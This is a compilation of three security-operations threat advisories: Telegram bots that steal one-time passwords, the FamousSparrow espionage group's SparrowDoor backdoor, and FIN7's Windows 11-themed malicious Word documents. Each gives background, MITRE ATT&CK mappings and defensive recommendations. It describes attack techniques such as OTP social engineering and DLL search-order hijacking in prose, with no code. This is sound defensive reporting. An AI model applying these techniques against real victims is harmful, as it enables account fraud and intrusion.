Cybercriminals are stealing one-time password tokens (OTPs) in order to gain access to PayPal, Apple Pay, Google Pay, and other contactless payment services.

III. Background Information

Researchers from Intel 471 have discovered that cybercriminals are using Telegram bots to steal OTPs and defraud people through banks and online payment systems.[1] Intel 471 researchers reported that the thieves have been operational since June. The threat actors are using Telegram bots, and a range of other tactics, to gain account information, including calling victims and impersonating banks and legitimate services. The cybercriminals are also trying to bypass two-factor authentication by using social engineering and deceiving victims into giving them an OTP, or other verification code via a mobile device, which the criminals use to defraud accounts.[1]

This isn’t the first time that Telegram bots have been used to defraud victims. A similar campaign was discovered in January, called Classiscam, where bots were sold as-a-service by Russian-speaking cybercriminals with the purpose of stealing money and payment data from European victims. Other criminals have been discovered using Telegram bots as command-and-control for spyware.[1] Intel 471 researchers analyzed and found three bots in this campaign: SMSRanger, BloodOTPbot, and SMS Buster.[1]

Intel 471 researchers described SMSRanger as “easy to use,” and similar in nature to a bot in the collaboration tool Slack. By using a “/”, scripts can be accessed that can target specific banks or payment services, like PayPal, Apple Pay, or a wireless carrier.[1] SMSRanger sends a potential victim a text message requesting for their phone number. Once the phone number has been entered in the chat, the bot takes over, ultimately giving the threat actors access to whatever account has been targeted. Researchers say that approximately 80 percent of the users who are targeted by SMSRanger will provide their full and accurate information to the cybercriminals, allowing the cybercriminals to defraud the victims.[1]

BloodOTPBot has the ability to send users a fraudulent OTP code via SMS. However, this bot requires an attacker to spoof the victim’s phone number and impersonate a bank or company representative.[1] The bot attempts to call victims and uses social engineering techniques to gather a verification code from the targeted victim. The attacker will receive a notification from the bot during the call, and the bot will tell the attacker when to request the OTP during the authentication process.[1] The bot then texts the code to the attacker once the victim receives the OTP and enters it on the phone’s keyboard. BloodOTPBot runs at $300 a month. Users can also pay between $20-$100 more to access live phishing panels that target social media networks, like Facebook, Instagram, Snapchat, and financial services like Venmo, PayPal, Robinhood, and even cryptocurrency marketplaces like Coinbase.[1]

The third bot, SMS Buster, requires more effort than the other previously mentioned bots, Intel 471 researchers say. The bot provides options so an attacker can shroud a call made from any phone number to make it seem as though a legitimate contact from a specific bank is calling. Once a potential victim has been reached, attackers follow a script to try to fool the victim into providing sensitive information like an ATM card PIN, a credit card verification value, or an OTP.[1] Researchers also saw that criminals use SMS Buster against Canadian victims, using English and French to target them. Intel 471 researchers have seen eight different Canadian-based banks illegally accessed by SMS Buster.

IV. MITRE ATT&CK

• T1528 – Steal Application Access Token
  Account access is dependent on threat actors stealing a user’s one-time password or OTP.
• T1566 – Phishing
  Telegram bots are being used to call users and impersonate banks and other services.
• T1078 – Valid Accounts
  Once an OTP has been compromised, attackers can use the client’s account to steal information, money, and potentially compromise other users.
• T1199 – Trusted Relationship
  Account access allows attackers to breach the organization and access their intended victims.
• T1036 – Masquerading
  Threat actors pretend to be the client’s bank to manipulate OTP controls and access the user.

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should alsobe educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

At the time of writing, no IOCs, or CVEs, have been issued.

VII. References

(1) Montalbano, Elizabeth. “Threat Actors Weaponize Telegram Bots to Compromise PayPal Accounts.” Threatpost English Global, September 29, 2021. https://threatpost.com/telegram-bots-compromise-paypal/175099/.

Threat Advisory created by the Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Jessica Senatus, Sreten Dedic, EJ Bulut, Uday Bilakhiya and Tural, Hagverdiyev.

I. Targeted Entities

• Hotels
• Governments
• Private organizations
• Engineering companies
• Law firms

II. Introduction

A cyberespionage group known as FamousSparrow has emerged, targeting governments, private organizations, and hotels around the globe with a custom backdoor called SparrowDoor.

III. Background Information

According to ESET, SparrowDoor is an advanced persistent threat (APT) with the ability to rename or delete files; create directories; shut down processes; send information such as file attributes, file size, and file write time; exfiltrate the content of a specified file; write data to a specified file; or establish an interactive reverse shell. SparrowDoor also has a kill switch to remove persistence settings and all SparrowDoor files from a victim’s machine.

FamousSparrow used a remote code execution (RCE) called ProxyLogon to deploy SparrowDoor via the exploitation of vulnerable internet-facing web applications. ESET researchers believe that FamousSparrow exploited well-known RCE vulnerabilities in Microsoft Exchange, Microsoft SharePoint, and Oracle Opera (which is used for hotel management), which were used to drop various malicious samples.

Once a machine is compromised, FamousSparrow infects the machine with a range of custom tools. ESET analysis says that the custom tools include: a Mimikatz variant for lateral movement; a small utility that drops ProcDump on disk and uses it to dump the lsass process, probably in order to gather in-memory secrets, such as credentials; Nbtscan, a NetBIOS scanner for identifying files and printers across a LAN; and a loader for the SparrowDoor backdoor. Researchers also noted that the loader installs SparrowDoor via DLL search order hijacking.

The malware loads itself by exposing itself to DLL search-order hijacking. Specifically, the legitimate executable, Indexer.exe requires the library K7UL.dll to operate. The victim operating system looks for the DLL file in the directories in the prescribed load order. Because the directory where the Indexer.exe file is stored is at the top priority in the load order, it is exposed to DLL search-order hijacking.

The malware is able to set persistence and establish encrypted TLS connections to a command-and-control sever on port 433. Furthermore, the malware is able to achieve privilege escalation by adjusting the access token of the SparrowDoor process to enable a legitimate Windows utility, SeDebugPrivilege, that is used to debug processes on computers other than one’s own. After that, SparrowDoor finds and sends the victim’s local IP address, a Remote Desktop Services session ID associated with the backdoor process, username, and computer name to the command-and-control server and waits for commands in return. This is in order to start the spying campaign.

FamousSparrow primarily targets hotels, but ESET has found FamousSparrow in other sectors. Notably governments, international organizations, engineering companies, and law firms. Attacks have also been seen globally, with attacks happening in Brazil, Canada, Israel, France, Guatemala, Lithuania, Saudia Arabia, South Africa, Taiwan, Thailand, and the United Kingdom.

IV. MITRE ATT&CK

• T1588.005 – Obtain Capabilities: Exploits
  FamousSparrow utilizes RCE vulnerabilities in Microsoft Exchange, Sharepoint, and oracle Opera.
• T1059.003 – Command and Scripting Interpreter: Windows Command Shell
  FamousSparrow uses Windows cmd.exe to download and install SparrowDoor.
• T1027 – Obfuscated Files or Information
  SparrowDoor encrypts the MpSvc.dll and config files utilizes with a XOR function.
• T1543.003 – Create or Modify System Process: Windows Service
  SparrowDoor is hidden within a fake Windows service called WSearchIndex.
• T1134.002 – Access Token Manipulation: Create Process with Token
  Using the CreateProcessAsUserA API SparrowDoor is able to use tokens to create new processes.
• T1082 – System Information Discovery
  SparrowDoor collects user and computer names in addition to RDP session and machine-specific drive information.
• T1083 – File and Directory Discovery
  SparrowDoor can examine files on infected machines.
• T1573.001 – Encrypted Channel: Symmetric Cryptography
  C2 communication is carried out using XOR keys.

V. Recommendations

• Ensure Antivirus Software is Updated
  Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
• Enable Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the products that are being used.

VI. IOCs

The links below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/tuz87dop8aiua88m62hw9yl1il5dmio6

VII. References

(1) Seals, Tara. “FamousSparrow APT Wings in to Spy on Hotels, Governments.” Threatpost English Global, September 23, 2021. https://threatpost.com/famoussparrow-spy-hotels-governments/174948/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya and Tural Hagverdiyev

FIN7 Windows 11 Alpha Campaign

I. Targeted Entities

• Technology Industry
• Windows Users
• General Public

II. Introduction

Using infected Microsoft Word documents, cybercrime group FIN7 has begun targeting the newly released Windows 11.[1] As reported by the researchers at Anomali, six new documents were seen circulating recently involving the use of JavaScript-based macros intended for the Windows 11 Alpha.[1] Researchers noted that the campaign appeared to primarily target a California-based company called Clearmind.[1] FIN7 is an Eastern European threat group that primarily targets U.S.-based companies.[3]

III. Background Information

Infection appears to use a standard attack vector where users are shown a document containing a decoy image. This image displays information stating that the image was made with Windows 11 Alpha.[1] The image asks the user to “Enable Editing and Content” to begin the next phase of the attack.[3] The VBScript is obfuscated with junk comments.[3] Researchers found that a hidden table contained encoded values that, when deciphered with a XOR cipher, revealed a key and table of languages.[3] The code performs checks to look for several Eastern-European languages in the included table that, if detected, will cause the table to be deleted and stop operation.[3]

It’s important to note that the script will also cease operations if a VM is detected or if the system doesn’t have more than 4GB of RAM available.[3] If enough checks pass then the system drops a file called word_data.js into the TEMP folder.[3] The JavaScript backdoor appears to share functionality with other backdoors used by the threat group in the past.[3] The script then reaches out to a domain to pass the host IP and DNS information.[3] The backdoor can allow attackers to deliver any payload they want to the target machine, and represents a foothold for future attacks.[2]

IV. MITRE ATT&CK

• T1059.005 – Command and Scripting Interpreter: Visual Basic
  FIN7 used VBS scripts to help perform tasks on the victim’s machine.
• T1059.007 – Command and Scripting Interpreter: JavaScript
  FIN7 used JavaScript scripts to help perform tasks on the victim’s machine.
• T1204.002 – User Execution: Malicious File
  FIN7 lures victims to “Enable Editing and Enable Content,” which would execute malicious files in the document.
• T1047 – Windows Management Instrument
  FIN7 may abuse Windows Management Instrumentation (WMI) to achieve execution.
• T1140 – Deobfuscate/Decode Files or Information
  FIN7 uses a hidden table inside the .doc file.
• T1027 – Obfuscated Files or Information
  FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.
• T1497 – Virtualization/Sandbox Evasion
  If a VM is detected, the script is killed.
• T1497.001 – Virtualization/Sandbox: System Checks
  The script used by FIN7 checks for Virtual Machines and if detected, stops running.
• T1087.002 – Account Discovery: Domain Account
  The script will check for specific domains.

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
• Malware Monitoring
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The links below have been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/te8lijr921avv32tnb8tmquzmdlskvt8

VII. References

(1) Seals, Tara. “Fin7 Capitalizes on Windows 11 Release in Latest Gambit.” Threatpost English Global threatpostcom. Accessed September 9, 2021. https://threatpost.com/fin7-windows-11-release/169206/.

(2) Ilascu, Ionut. “Watch out for New Malware Campaign’s ‘Windows 11 Alpha’ Attachment.” BleepingComputer. BleepingComputer, September 4, 2021. https://www.bleepingcomputer.com/news/security/watch-out-for-new-malware-campaign-s-windows-11-alpha-attachment/.

(3) Threat Research, Anomali. “FIN7 Using Windows 11 Alpha-Themed Docs to Drop JAVASCRIPT Backdoor.” Anomali. Accessed September 9, 2021. https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor.

Threat Advisory created by the Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, and Tural Hagverdiyev.